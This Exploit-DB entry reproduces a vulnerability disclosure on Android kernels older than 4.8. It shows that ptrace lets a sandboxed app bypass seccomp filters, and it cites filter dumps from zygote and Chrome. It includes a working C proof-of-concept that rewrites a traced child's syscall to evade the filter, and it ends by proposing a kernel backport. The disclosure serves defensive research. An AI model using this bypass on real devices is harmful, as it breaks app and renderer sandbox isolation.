Android Kernel < 4.8 - ptrace seccomp Filter Bypass

EDB-ID:

46434

CVE:

N/A




Platform:

Android

Date:

2019-02-20


/*
The seccomp.2 manpage (http://man7.org/linux/man-pages/man2/seccomp.2.html) documents:

              Before kernel 4.8, the seccomp check will not be run again
              after the tracer is notified.  (This means that, on older ker‐
              nels, seccomp-based sandboxes must not allow use of
              ptrace(2)—even of other sandboxed processes—without extreme
              care; ptracers can use this mechanism to escape from the sec‐
              comp sandbox.)

Multiple existing Android devices with ongoing security support (including Pixel 1 and Pixel 2) ship kernels older than that; therefore, in a context where ptrace works, seccomp policies that don't blacklist ptrace can not be considered to be security boundaries.


The zygote applies a seccomp sandbox to system_server and all app processes; this seccomp sandbox permits the use of ptrace:

================
===== filter 0 (164 instructions) =====
0001 if arch == AARCH64: [true +2, false +0]
[...]
0010     if nr >= 0x00000069: [true +1, false +0]
0012       if nr >= 0x000000b4: [true +17, false +16] -> ret TRAP
0023       ret ALLOW (syscalls: init_module, delete_module, timer_create, timer_gettime, timer_getoverrun, timer_settime, timer_delete, clock_settime, clock_gettime, clock_getres, clock_nanosleep, syslog, ptrace, sched_setparam, sched_setscheduler, sched_getscheduler, sched_getparam, sched_setaffinity, sched_getaffinity, sched_yield, sched_get_priority_max, sched_get_priority_min, sched_rr_get_interval, restart_syscall, kill, tkill, tgkill, sigaltstack, rt_sigsuspend, rt_sigaction, rt_sigprocmask, rt_sigpending, rt_sigtimedwait, rt_sigqueueinfo, rt_sigreturn, setpriority, getpriority, reboot, setregid, setgid, setreuid, setuid, setresuid, getresuid, setresgid, getresgid, setfsuid, setfsgid, times, setpgid, getpgid, getsid, setsid, getgroups, setgroups, uname, sethostname, setdomainname, getrlimit, setrlimit, getrusage, umask, prctl, getcpu, gettimeofday, settimeofday, adjtimex, getpid, getppid, getuid, geteuid, getgid, getegid, gettid, sysinfo)
0011     if nr >= 0x00000068: [true +18, false +17] -> ret TRAP
0023     ret ALLOW (syscalls: nanosleep, getitimer, setitimer)
[...]
002a if nr >= 0x00000018: [true +7, false +0]
0032   if nr >= 0x00000021: [true +3, false +0]
0036     if nr >= 0x00000024: [true +1, false +0]
0038       if nr >= 0x00000028: [true +106, false +105] -> ret TRAP
00a2       ret ALLOW (syscalls: sync, kill, rename, mkdir)
0037     if nr >= 0x00000022: [true +107, false +106] -> ret TRAP
00a2     ret ALLOW (syscalls: access)
0033   if nr >= 0x0000001a: [true +1, false +0]
0035     if nr >= 0x0000001b: [true +109, false +108] -> ret TRAP
00a2     ret ALLOW (syscalls: ptrace)
0034   if nr >= 0x00000019: [true +110, false +109] -> ret TRAP
00a2   ret ALLOW (syscalls: getuid)
[...]
================

The SELinux policy allows even isolated_app context, which is used for Chrome's renderer sandbox, to use ptrace:

================
# Google Breakpad (crash reporter for Chrome) relies on ptrace
# functionality. Without the ability to ptrace, the crash reporter
# tool is broken.
# b/20150694
# https://code.google.com/p/chromium/issues/detail?id=475270
allow isolated_app self:process ptrace;
================

Chrome applies two extra layers of seccomp sandbox; but these also permit the use of clone and ptrace:
================
===== filter 1 (194 instructions) =====
0001 if arch == AARCH64: [true +2, false +0]
[...]
0002 if arch != ARM: [true +0, false +60] -> ret TRAP
[...]
0074     if nr >= 0x0000007a: [true +1, false +0]
0076       if nr >= 0x0000007b: [true +74, false +73] -> ret TRAP
00c0       ret ALLOW (syscalls: uname)
0075     if nr >= 0x00000079: [true +75, false +74] -> ret TRAP
00c0     ret ALLOW (syscalls: fsync, sigreturn, clone)
[...]
004d   if nr >= 0x0000001a: [true +1, false +0]
004f     if nr >= 0x0000001b: [true +113, false +112] -> ret TRAP
00c0     ret ALLOW (syscalls: ptrace)
[...]
===== filter 2 (449 instructions) =====
0001 if arch != ARM: [true +0, false +1] -> ret TRAP
[...]
00b6         if nr < 0x00000019: [true +4, false +0] -> ret ALLOW (syscalls: getuid)
00b7         if nr >= 0x0000001a: [true +3, false +8] -> ret ALLOW (syscalls: ptrace)
01c0         ret TRAP
[...]
007f     if nr >= 0x00000073: [true +0, false +5]
0080       if nr >= 0x00000076: [true +0, false +2]
0081         if nr < 0x00000079: [true +57, false +0] -> ret ALLOW (syscalls: fsync, sigreturn, clone)
[...]
================

Therefore, this not only breaks the app sandbox, but can probably also be used to break part of the isolation of a Chrome renderer process.


To test this, build the following file (as an aarch64 binary) and run it from app context (e.g. using connectbot):

================
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <err.h>
#include <signal.h>
#include <sys/ptrace.h>
#include <errno.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <linux/elf.h>
#include <asm/ptrace.h>
#include <sys/uio.h>

int main(void) {
  setbuf(stdout, NULL);

  pid_t child = fork();
  if (child == -1) err(1, "fork");
  if (child == 0) {
    pid_t my_pid = getpid();
    while (1) {
      errno = 0;
      int res = syscall(__NR_gettid, 0, 0);
      if (res != my_pid) {
        printf("%d (%s)\n", res, strerror(errno));
      }
    }
  }

  sleep(1);

  if (ptrace(PTRACE_ATTACH, child, NULL, NULL)) err(1, "ptrace attach");
  int status;
  if (waitpid(child, &status, 0) != child) err(1, "wait for child");

  if (ptrace(PTRACE_SYSCALL, child, NULL, NULL)) err(1, "ptrace syscall entry");
  if (waitpid(child, &status, 0) != child) err(1, "wait for child");

  int syscallno;
  struct iovec iov = { .iov_base = &syscallno, .iov_len = sizeof(syscallno) };
  if (ptrace(PTRACE_GETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) err(1, "ptrace getregs");
  printf("seeing syscall %d\n", syscallno);
  if (syscallno != __NR_gettid) errx(1, "not gettid");
  syscallno = __NR_swapon;
  if (ptrace(PTRACE_SETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) err(1, "ptrace setregs");

  if (ptrace(PTRACE_DETACH, child, NULL, NULL)) err(1, "ptrace syscall");
  kill(child, SIGCONT);
  sleep(5);
  kill(child, SIGKILL);
  return 0;
}

/*
================

If the attack works, you'll see "-1 (Operation not permitted)", which indicates that the seccomp filter for swapon() was bypassed and the kernel's capability check was reached.

For comparison, the following (a straight syscall to swapon()) fails with SIGSYS:

================
#include <unistd.h>
#include <sys/syscall.h>
int main(void) {
  syscall(__NR_swapon, 0, 0);
}
================

Attaching screenshot from connectbot.

I believe that a sensible fix would be to backport the behavior change that occured in kernel 4.8 to Android's stable branches.
*/